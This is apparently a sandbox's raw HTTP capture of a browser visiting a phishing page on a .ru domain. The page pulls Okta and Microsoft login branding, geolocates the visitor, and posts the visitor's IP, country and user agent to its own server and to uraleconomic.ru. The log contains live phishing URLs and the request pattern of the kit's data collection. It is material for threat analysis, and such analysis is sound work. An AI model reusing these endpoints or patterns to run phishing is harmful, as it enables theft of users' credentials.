                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.44976513.33.187.144435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:03 UTC665OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                                  Host: ok4static.oktacdn.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:03 UTC874INHTTP/1.1 200 OK
                                                                  Content-Type: image/png
                                                                  Content-Length: 10796
                                                                  Connection: close
                                                                  Date: Wed, 12 Mar 2025 18:13:09 GMT
                                                                  Server: nginx
                                                                  Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                                  ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                                  Expires: Thu, 12 Mar 2026 18:13:09 GMT
                                                                  Cache-Control: max-age=31536000
                                                                  Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                                  Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                                  Access-Control-Allow-Origin: *
                                                                  Content-Security-Policy: default-src 'none'; img-src 'self'; require-trusted-types-for 'script'; report-uri https://oktacsp.report-uri.com/r/t/csp/enforce
                                                                  X-Content-Type-Options: nosniff
                                                                  Accept-Ranges: bytes
                                                                  X-Cache: Hit from cloudfront
                                                                  Via: 1.1 d6dae4153314f4d7a17919a7dd5a237c.cloudfront.net (CloudFront)
                                                                  X-Amz-Cf-Pop: FRA60-P9
                                                                  X-Amz-Cf-Id: FFO1LyvY4sY7fSijhlh1lGjV-METjbnhTn4DaaQ4mt8R8pFAIdVhjQ==
                                                                  Age: 148674
                                                                  2025-03-14 11:31:03 UTC9594INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                                  Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$
                                                                  2025-03-14 11:31:03 UTC1202INData Raw: 6c 0b 68 b0 eb d0 ec 96 af 0a 75 49 60 6e 28 c7 02 b3 5f ea 32 ba 1e 99 8d 5d c4 39 4a e0 5c 19 59 9f 62 64 75 5c a3 d7 0f d6 28 10 0a 19 7c 5c 27 cf f6 c6 e8 1a 2f e9 14 d6 c3 29 ee cc e3 f8 28 03 67 1e f8 4a 12 d6 6f 46 2d cf 3c 86 ab 83 e6 d8 99 82 7d c6 35 2e 30 e7 cd de df e9 4a a6 33 24 cd 0d db a9 c3 ba fd 0f 08 68 ab 41 8b 2d 6a dd 72 f7 3a 89 e7 13 bb 12 54 62 c6 f7 aa c3 6a ca 99 59 43 7d ba 27 a6 3e 0d 8c e0 1a 5b 57 be e3 46 23 93 ab 29 15 84 76 f8 98 fa 03 09 48 45 48 ba 53 26 7c d2 31 31 9a 8e 1e df 1b 53 cf 74 74 7a 03 8c fb 50 32 83 03 f5 38 86 f0 c3 be ff 2e 6d a8 3f ef ed 50 4f 8c 63 de 8a 4e 0e 6e 91 54 37 b4 e8 c8 7d 22 16 08 18 59 83 9c 9a 34 c9 d5 36 a3 7f c4 7a 78 c1 f8 73 d2 a0 d7 f7 99 f4 14 4b a7 d3 d3 47 57 a7 90 26 32 cd 4e 2d
                                                                  Data Ascii: lhuI`n(_2]9J\Ybdu\(|\'/)(gJoF-<}5.0J3$hA-jr:TbjYC}'>[WF#)vHEHS&|11SttzP28.m?POcNnT7}"Y46zxsKGW&2N-


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  41192.168.2.449770104.26.1.1004435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:05 UTC634OUTGET /v1/ip/geo.json HTTP/1.1
                                                                  Host: get.geojs.io
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: application/json, text/javascript, */*; q=0.01
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:05 UTC1123INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:05 GMT
                                                                  Content-Type: application/json
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  x-request-id: e0d00a149fa08b656a3a78c2f9aa526a-ASH
                                                                  strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                  access-control-allow-origin: *
                                                                  access-control-allow-methods: GET
                                                                  pragma: no-cache
                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  geojs-backend: ash-01
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iJniYpqnzZUMhmdHOKxCIEjc8LapoNRuLqByi2dwtR41mK%2BFV%2B2Fcxya3GLgvUbqHE99RC9xO5C%2BFSnD3qA3Yti2ixWzGJt2b8wQs7yKcaXtlBlctfFqHS610jGspw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  X-Content-Type-Options: nosniff
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371577f584277-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1606&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1206&delivery_rate=1818181&cwnd=201&unsent_bytes=0&cid=c3fbff6e1f10582b&ts=158&x=0"
                                                                  2025-03-14 11:31:05 UTC333INData Raw: 31 34 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 5f
                                                                  Data Ascii: 146{"ip":"8.46.123.189","timezone":"America\/New_York","accuracy":20,"organization":"AS3356 LEVEL3","asn":3356,"city":"New York","area_code":"0","organization_name":"LEVEL3","country":"United States","country_code3":"USA","continent_code":"NA","country_
                                                                  2025-03-14 11:31:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  42192.168.2.449771104.21.0.2234435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:06 UTC804OUTPOST /1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNrsNQTs1MZKlJNYj12Wkwx40 HTTP/1.1
                                                                  Host: yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru
                                                                  Connection: keep-alive
                                                                  Content-Length: 115
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-mobile: ?0
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:06 UTC115OUTData Raw: 64 61 74 61 3d 37 71 73 5a 50 53 51 48 71 74 70 44 75 48 62 6d 74 4c 33 56 4b 7a 6b 47 61 4e 54 50 35 73 4c 33 6b 73 54 45 6f 38 69 58 4a 39 68 70 61 74 76 75 4a 62 7a 37 68 7a 31 72 64 52 4a 4b 58 66 4d 50 4b 46 33 53 5a 34 34 32 64 7a 4f 75 5a 50 56 43 6d 58 32 71 64 5a 44 70 64 61 38 32 46 52 72 4a 55 71 46 56 49 31 6b 35 78 43 51 25 33 44
                                                                  Data Ascii: data=7qsZPSQHqtpDuHbmtL3VKzkGaNTP5sL3ksTEo8iXJ9hpatvuJbz7hz1rdRJKXfMPKF3SZ442dzOuZPVCmX2qdZDpda82FRrJUqFVI1k5xCQ%3D
                                                                  2025-03-14 11:31:07 UTC944INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:07 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 620
                                                                  Connection: close
                                                                  vary: Origin
                                                                  access-control-allow-origin: https://encryption-marinha.jkndfuzv.ru
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vOWUTswsY%2FlyOvY88dB%2B2%2FzKWHsZsKozRlNANGWTfXDaV7q52A%2B7YFq%2BClyTf1uLlM3K3FwtegkKzrk%2FRWOna%2BYbB6jTcqu4yoCDSHT6R2LXoSh7L3E80pQlxoQSr9YLiqASvkB4h05cQ3x3EqMnMdIQJAwmnZveJXGk3SzGHCgsEA2SFADwOHE%2Ff9WHGxBUG3HUJR%2BY"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203715ba88b4366-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1651&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1513&delivery_rate=1725768&cwnd=204&unsent_bytes=0&cid=07b0f0fbbc99e09e&ts=1007&x=0"
                                                                  2025-03-14 11:31:07 UTC425INData Raw: 2b 70 64 4c 71 42 52 79 6f 61 46 67 31 30 67 59 68 2b 51 43 31 35 69 7a 66 30 71 34 34 68 76 4d 4b 55 74 59 57 36 2b 37 75 56 71 6c 31 4e 59 4a 38 61 71 58 66 43 6a 4d 38 42 4c 72 59 4f 6a 63 53 7a 65 33 71 70 69 2b 74 45 7a 43 45 58 41 43 67 2f 53 39 52 62 32 31 35 30 4a 70 48 4c 6c 53 58 43 36 73 34 56 79 30 36 49 55 6a 70 4a 2f 62 62 2f 7a 53 30 62 5a 2f 62 73 39 47 48 72 2b 30 2b 37 48 44 52 78 68 76 39 2f 33 77 41 64 6b 35 58 69 57 52 43 4e 75 4d 62 57 58 7a 44 64 4c 55 32 65 47 71 43 50 59 65 6f 71 6d 44 46 79 72 4e 6d 57 4e 53 52 47 36 68 34 69 39 48 46 57 31 61 53 41 52 64 36 64 78 44 41 45 42 73 46 37 59 41 47 6b 4a 59 4e 2f 35 50 33 6c 39 56 51 44 39 31 64 46 47 47 6e 76 37 4f 78 58 43 6b 64 4d 4b 4a 62 55 68 61 72 75 65 6f 4f 32 4a 6e 32 2b 48
                                                                  Data Ascii: +pdLqBRyoaFg10gYh+QC15izf0q44hvMKUtYW6+7uVql1NYJ8aqXfCjM8BLrYOjcSze3qpi+tEzCEXACg/S9Rb2150JpHLlSXC6s4Vy06IUjpJ/bb/zS0bZ/bs9GHr+0+7HDRxhv9/3wAdk5XiWRCNuMbWXzDdLU2eGqCPYeoqmDFyrNmWNSRG6h4i9HFW1aSARd6dxDAEBsF7YAGkJYN/5P3l9VQD91dFGGnv7OxXCkdMKJbUharueoO2Jn2+H
                                                                  2025-03-14 11:31:07 UTC195INData Raw: 54 38 34 43 42 42 37 2b 43 68 4a 43 59 55 62 78 63 6b 30 63 4b 6d 64 46 38 76 30 74 41 61 63 4b 6d 50 58 64 50 59 58 32 6e 42 46 36 68 57 6f 4e 6c 6e 54 66 62 72 30 37 44 53 36 59 43 61 42 6a 4b 33 32 37 69 50 44 5a 54 30 38 50 35 31 43 43 34 71 2b 6c 6e 47 57 39 41 31 77 39 46 67 65 76 4f 77 72 56 4d 71 55 70 38 70 6a 41 56 6a 31 51 30 6f 66 4c 34 32 63 4b 46 31 65 57 50 6b 36 6f 66 36 38 4a 53 79 7a 78 2b 72 44 59 72 57 6f 43 53 59 64 6c 2b 6c 35 45 57 38 57 58 48 4b 44 51 79 75 2b 64 32 38 4d 39 32 6b 2b 6f 33 4d 78 34 61 30 54 4f 55 30 5a 77 44 34 4a 4e 72 52 67 65 72 45 3d
                                                                  Data Ascii: T84CBB7+ChJCYUbxck0cKmdF8v0tAacKmPXdPYX2nBF6hWoNlnTfbr07DS6YCaBjK327iPDZT08P51CC4q+lnGW9A1w9FgevOwrVMqUp8pjAVj1Q0ofL42cKF1eWPk6of68JSyzx+rDYrWoCSYdl+l5EW8WXHKDQyu+d28M92k+o3Mx4a0TOU0ZwD4JNrRgerE=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  43192.168.2.4497722.22.242.184435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:07 UTC745OUTGET /c1c6b6c8-oza7ewv53y3yvexbsc84eiyfwmickr2pstnkwdujq6s/logintenantbranding/0/bannerlogo?ts=636959481277037644 HTTP/1.1
                                                                  Host: aadcdn.msauthimages.net
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:08 UTC710INHTTP/1.1 200 OK
                                                                  Content-Length: 4251
                                                                  Content-Type: image/*
                                                                  Content-MD5: 2qaMhtw2bnl5vyOqiL7Z4g==
                                                                  Last-Modified: Wed, 12 Jun 2019 14:55:27 GMT
                                                                  ETag: 0x8D6EF4601DEBB13
                                                                  x-ms-request-id: 315f33b7-901e-0023-1465-6743f9000000
                                                                  x-ms-version: 2009-09-19
                                                                  x-ms-lease-status: unlocked
                                                                  x-ms-blob-type: BlockBlob
                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=86400
                                                                  Date: Fri, 14 Mar 2025 11:31:08 GMT
                                                                  Connection: close
                                                                  X-Content-Type-Options: nosniff
                                                                  Akamai-GRN: 0.0ef21602.1741951867.2a3bd02
                                                                  2025-03-14 11:31:08 UTC4251INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 82 00 00 00 2a 08 06 00 00 00 7f 4c 83 7e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 10 3d 49 44 41 54 78 da ec 5c 0b 78 54 d5 b5 5e 73 e6 fd 4e 32 4c 32 09 04 08 21 c1 98 08 e4 01 1a 48 80 70 cb 4b 08 8f 80 a0 16 b8 b7 4a ad 5a e5 e1 e3 e2 a3 20 21 d8 2b 5e 4b 41 e5 61 a5 05 12 ac 28 a5 6a a1 4a fc 22 b6 42 01 ed 6d ab 5e bf 02 09 98 40 1e 84 4c 1e 93 f7 64 32 8f bb d6 c9 1e 3c 1e cf 4c 02 1f 57 d2 7c b3 be 6f 7d 33 67 9f 3d fb 9c 39 6b ed 7f fd 6b ed 3d a3 a8 af af 07 12 8b c5 02 27 4e 9c 80 7b ee 5e 02 75 75 75 b0 7d c7 4e 58 b1 62 05 54 d7 d4 00 c7 71 10 69 b5 2a 4f 9d 3a 35 6b ce 9d b3 8e 98 cc 66 6f 58 58 18 78 bd 5e b8
                                                                  Data Ascii: PNGIHDR*L~tEXtSoftwareAdobe ImageReadyqe<=IDATx\xT^sN2L2!HpKJZ !+^KAa(jJ"Bm^@Ld2<LW|o}3g=9kk='N{^uuu}NXbTqi*O:5kfoXXx^


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  44192.168.2.449773104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:15 UTC1555OUTPOST /ngCf6zNL05pFHgvTMQm9xQYlhkLm1aOsVcQy9yi32 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Content-Length: 248
                                                                  sec-ch-ua-platform: "Windows"
                                                                  X-Requested-With: XMLHttpRequest
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-mobile: ?0
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:15 UTC248OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 6c 6b 6d 30 4f 61 75 50 48 6d 72 36 45 43 41 6d 74 57 58 67 7a 77 25 33 44 25 33 44 26 6d 61 69 6c 74 79 70 65 3d 30 26 74 79 70 65 3d 33 26 74 79 70 65 76 61 6c 3d 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 31 38 39 26 63 6f 75 6e 74 72 79 3d 55 6e 69 74 65 64 2b 53 74 61 74 65 73 26 75 73 65 72 61 67 65 6e 74 3d 4d 6f 7a 69 6c 6c 61 25 32 46 35 2e 30 2b 28 57 69 6e 64 6f 77 73 2b 4e 54 2b 31 30 2e 30 25 33 42 2b 57 69 6e 36 34 25 33 42 2b 78 36 34 29 2b 41 70 70 6c 65 57 65 62 4b 69 74 25 32 46 35 33 37 2e 33 36 2b 28 4b 48 54 4d 4c 25 32 43 2b 6c 69 6b 65 2b 47 65 63 6b 6f 29 2b 43 68 72 6f 6d 65 25 32 46 31 33 34 2e 30 2e 30 2e 30 2b 53 61 66 61 72 69 25 32 46 35 33 37 2e 33 36 26 61 70 70 6e 75 6d 3d 31
                                                                  Data Ascii: pagelink=lkm0OauPHmr6ECAmtWXgzw%3D%3D&mailtype=0&type=3&typeval=0&ip=8.46.123.189&country=United+States&useragent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F134.0.0.0+Safari%2F537.36&appnum=1
                                                                  2025-03-14 11:31:15 UTC1208INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNOmtQfwy3dS4Vey%2BL0FTxYHf2ePwVFIrC65Gn8wMX8Y%2F8Lqy4DXM%2FzQKxD4x4wjVWfP2VoyqfSgPYYNwALw%2BdVAnhHyENFRXu5VzSGrZOW%2BoujvtPFYzMTD5A1n"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4575&min_rtt=4548&rtt_var=1299&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2710&delivery_rate=619130&cwnd=251&unsent_bytes=0&cid=739cd4df0c7565aa&ts=103&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6InQxWlVIRmthYW8yaDd2VVpvVWgxQkE9PSIsInZhbHVlIjoieUgvMXljNmZUcVh0U25SVTkraVlHR1pSalRJOXZ6SWlJNHdTUFgvUEVRdTBkVTA2UGEyVVZsbmFxWFIyRnU2cVI0amlPbm1mN1RINGlyM1NmK0NWMFFtbXA2amM4M2dEUFhPU1Z1OFgycWlINlpVZ1pJWTl6dDNzS0NCV3NUTWEiLCJtYWMiOiI5NjhmYTcyNzliMGRhODhlMDYzMGJmN2U5ZjU0NWU1ZTlhZmMyNTEwMDYwOTU1YWI3MTg2MTNlYWYxMzZiZmUxIiwidGFnIjoiIn0%3D; expires=Fri, 14-Mar-2025 13:31:15 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-03-14 11:31:15 UTC762INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 78 34 5a 33 68 6e 55 57 67 35 5a 48 4a 46 4e 47 5a 53 61 6b 31 31 4c 31 46 4c 62 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 6c 5a 79 61 79 39 52 54 31 70 58 56 45 45 34 54 58 4d 33 59 30 6c 4c 51 56 46 6c 53 54 6b 32 57 6c 55 33 64 6c 68 32 53 30 68 43 61 55 64 4c 56 6d 73 31 4f 55 74 32 65 48 5a 53 4e 33 42 6c 5a 7a 64 32 52 30 78 59 55 7a 68 4e 55 6e 68 76 59 6a 68 53 5a 6e 64 79 4e 45 64 6d 62 6b 52 43 64 32 4e 69 56 56 59 33 53 45 35 42 61 33 4a 46 64 7a 6c 49 59 6c 4e 6a 4d 55 6c 73 51 31 46 44 63 6d 68 30 61 45 4e 31 63 43 39 70 63 57 64 5a 57 56 6c 53 5a 6b 31 33 54 54 42 57 64 57 56 6b 53 6d 31 79 4e 6e 42 47 56 47 67
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ikx4Z3hnUWg5ZHJFNGZSak11L1FLblE9PSIsInZhbHVlIjoiTlZyay9RT1pXVEE4TXM3Y0lLQVFlSTk2WlU3dlh2S0hCaUdLVms1OUt2eHZSN3BlZzd2R0xYUzhNUnhvYjhSZndyNEdmbkRCd2NiVVY3SE5Ba3JFdzlIYlNjMUlsQ1FDcmh0aEN1cC9pcWdZWVlSZk13TTBWdWVkSm1yNnBGVGg
                                                                  2025-03-14 11:31:15 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                  Data Ascii: 11
                                                                  2025-03-14 11:31:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  45192.168.2.449774104.21.0.2234435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:15 UTC805OUTPOST /1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNyzkBxoKGAwbe78mSYF72qr44 HTTP/1.1
                                                                  Host: yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru
                                                                  Connection: keep-alive
                                                                  Content-Length: 141
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-mobile: ?0
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
